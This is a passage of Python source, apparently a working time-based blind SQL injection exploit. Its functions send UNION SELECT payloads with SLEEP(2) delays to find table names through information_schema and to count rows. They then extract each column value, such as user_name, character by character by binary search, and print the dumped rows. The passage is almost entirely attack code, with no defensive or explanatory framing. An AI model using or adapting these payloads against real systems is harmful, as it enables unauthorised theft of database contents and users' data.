def evaluate_delay():
global DELTA
deltas = []
payload = "' UNION SELECT SLEEP(2)-- - '"
for _ in range(3):
deltas.append(check(payload))
DELTA = sum(deltas)/len(deltas)
def get_tbl_name_len():
i = 0
while 1:
payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
return i-1
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_tbl_name(length):
tbl_name = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
tbl_name += chr(min)
if DEBUG:
print(f"[DEBUG] Table name: {tbl_name}")
return tbl_name
def get_rows_number(tbl_name):
i = 0
while 1:
payload = f"' UNION SELECT (CASE WHEN (SELECT COUNT(user_name) FROM {tbl_name})>{i} THEN 0 ELSE SLEEP(2) END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
return i
i += 1
def get_elt_len(tbl_name, column_name, offset):
i = 0
while 1:
payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1 OFFSET {offset})<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
if DEBUG:
print(
f"[DEBUG] Element {offset} in {column_name} from {tbl_name} length: {i-1}")
return i-1
i += 1
def get_elt(tbl_name, column_name, offset, length):
elt = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1 OFFSET {offset} )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
if check(payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
elt += chr(min)
if DEBUG:
print(
f"[DEBUG] Element {offset} in {column_name} from {tbl_name}: {elt}")
print(f"[*] Element {offset} in {column_name} from {tbl_name}: {elt}")
return elt
def get_rows(tbl_name, row_number):
print(f"[*] Trying to dump {tbl_name}")
rows = []
for offset in range(row_number):
row = []
for column_name in COLUMNS:
elt_length = get_elt_len(tbl_name, column_name, offset)
row.append(get_elt(tbl_name, column_name, offset, elt_length))
print(f"[*] Row {offset}: {row}")
rows.append(row)
print(f"[*] Rows: {rows}")
def main():
if len(sys.argv) < 2:
print(usage())
exit(-1)
if DEBUG:
print(f"[*] Target: {sys.argv[1]}")
if DEBUG:
print(f"[DEBUG] Writting generator to {GENERATOR_NAME}")
generator("w")
evaluate_delay()
if DEBUG:
print(f"[*] Delta: {DELTA}")
tbl_name_len = get_tbl_name_len()
if DEBUG:
print(
f"[DEBUG] Looking for table like {LIKE} with length {tbl_name_len}")